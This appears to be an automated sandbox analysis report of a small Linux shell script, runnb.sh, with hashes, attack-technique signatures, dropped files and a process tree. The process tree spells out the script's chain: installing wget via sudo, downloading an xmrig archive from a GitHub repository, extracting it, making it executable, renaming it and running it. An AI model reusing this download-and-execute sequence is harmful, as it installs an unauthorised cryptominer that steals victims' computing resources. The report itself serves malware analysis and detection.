Analysis
-
max time kernel
117s -
max time network
150s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
30/10/2024, 13:06
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 769 chmod -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 712 sudo -
Reads CPU attributes 1 TTPs 2 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online exim4 -
description ioc Process File opened for reading /proc/self/stat sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems sudo File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/fd sudo File opened for reading /proc/filesystems tar File opened for reading /proc/sys/kernel/ngroups_max sudo -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/fileutl.message.0ksS1M apt File opened for modification /tmp/fileutl.message.9MdXSo apt File opened for modification /tmp/fileutl.message.SpDNgo apt File opened for modification /tmp/fileutl.message.UkZHET apt File opened for modification /tmp/fileutl.message.Cby9mA apt File opened for modification /tmp/fileutl.message.ObiKey apt File opened for modification /tmp/fileutl.message.4SnVT5 apt File opened for modification /tmp/fileutl.message.ChveDP apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:707
-
/usr/bin/sudosudo apt install wget2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:712 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:721 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t67Wi-0000Bd-5p4⤵
- Reads CPU attributes
PID:744
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:724 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t67Wc-0000Bg-PL4⤵
- Reads CPU attributes
PID:736
-
-
-
/usr/bin/aptapt install wget3⤵
- Reads runtime system information
- Writes file to tmp directory
PID:727 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:734
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:741
-
-
-
-
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:765
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:766
-
-
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:767
-
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:768
-
-
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:769
-
-
/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:770
-
-
/tmp/cool./cool2⤵PID:771
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5defb52d953ba1b8cdd8d28da9548691d
SHA10dbe1daa37ad64aa25e312b909bd14d9ea1623e4
SHA256706ae75700886c08a09231c63974a309669ab2b2a35321aca180527c913d2a55
SHA512e89a6591192104a776660e1c42a86283a3794cf07323a3ce50ced9595bce81dfa0d1e767d679e6d5f9c3d85eb79445eaa6267c68d167e8b28bc58134a4135487
-
Filesize
843B
MD5595f01a473b87dcc39e302e361f6df08
SHA125dea5bef0cf97cf31315da0646a0397437ad072
SHA256d85665da254724a749f3f45c509c76c71ebda1284c65d6edd8892d9da7124c33
SHA512db87eae970e29d06417a57a6d85553745a78ca76fd4e969297a0c41791371612d7ab253633caa146d7968d36b47c59b77f8416e1d4dfd9a2e20b74ae3cb8fa2a
-
Filesize
146B
MD529b5f65cec8f10e1d9237bfafd8cfe15
SHA10f553f30b89e44ffee5818aad2210fd82bf32bd3
SHA256b86b2bb584861a5e3b8bf97967009bde0fc62280f39600fd9c234c803aaf6441
SHA5122931246165e2cec85ca12cdd4a9c4cecf9afb4b2d8b2815b850cc9f9439289964965ca15a9641b42dca83429b371d3f769f8af6f5cc5011c691e656c78596887
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
128B
MD58e808517d77ff16d7f6d85e618773d5f
SHA1c4efef4f2f7fc9bca9dfa463e04221f427e2f868
SHA25639ea94a36c53279733341a715dad7cdead8855014ba1dec922fec93dea206ec3
SHA512ed232da15152f741b8fddc799410dad048be911a517c180dd45ce7101414fb68e252771e1f96bf1b7767cd19b132aac0d5d35b66d50eb4eb5e7ba4699bb2ce5a
-
Filesize
915B
MD5464af924c2dd82cb355ee78804b618f8
SHA17344b64dd2495ef205f0dbe3bd9c954ca7968bae
SHA256032439411b7d4f76fab08cae52b7a24db065a64290fb6199191a7d557c62cf7f
SHA51270e7ac84c4a59010c8b0e9e544e456a407cbf4e729996cf2f3dd3be52a491194dc0a8150813d2e514ea24e2ad6822fb0a64e429d382ca626d597f33a48484980
-
Filesize
915B
MD559c8e7fe07aa10d886a5622d216dc544
SHA1e53a9c43d1431f54893a5408a8017743ead8610b
SHA256471604ebbe65ddc35263f86d70acc38e8a227fe2cd3bbc390dcbb6d711cfaa80
SHA512c9ad288951a0990cee04a91e4ede557b762bce507a22a89c8552792c35c7990e15d707aa0c04b8856951689dd01d9f5edef75334ce51369421b0e453b4213bd3
-
Filesize
288B
MD5f7c45ad668ded36ddd10c0367e39f6f8
SHA13a894d2836d02d13f70fc440e809c061ed1ee328
SHA2568f207e2aaa6d3dc408f01d993a6a759d7ddd871b95c3028dc7a1871cf3604bac
SHA5129586fa67141a51c7363b884715708683c134402d12f6d8f757055d7e0518174ad2ea9878c79fe4ea510c5a2446ab4c5e94626e6870bac0feaa1f94dd0621e660
-
Filesize
89B
MD51ff982473d7d2811859739a172bcf583
SHA1d2bbe4a1be37b272af7d0acb7da6ed5a3495c699
SHA2560e77dcd0195ad198b94be3603f8abf5fb697b795e4d930b76608610665ac031d
SHA512fa52212c6ad9ef9364f22efa1095fde665d4fa4d998ab7fbcc60b41f65a582eb8b6693b0b86021dd106047eaad857703dcd093b30e604f16611321d621c8308f
-
Filesize
89B
MD5ce77a0cffed93d570d31c72c7d613582
SHA1427e46e2284e8904a2dd035571d497e6afcff6fa
SHA2561443ec8f0a33ab52ed79e52793f54c5ec1d5608c22acea3ad2aec7a83e6d71f0
SHA512e95a638f5e4129bda33556d72b383fb9b2e481e787be2fdda054b4b077b3aa70ba5af6357f07acacfd6a0865d1e3091ee2013db292e200ddd79db3fdc95e4a59
-
Filesize
288B
MD578dc3e8c66bd615089879ac53d483b98
SHA1f9dd7bbbf5c7b447f39a6de989cf24a186571435
SHA2566f405a4e3314b91bea1809bb179fba5e3cecda801b13c2ff1c48640b9984f7d7
SHA512dcb52c5cc47f650e08bf6e08fa34fcee7b6f7c3ba864a281668929d17a1cf4a4ced83c196493a5d08a70b7b66f3216f548591e3d6bee2d84ea28554b68046f0a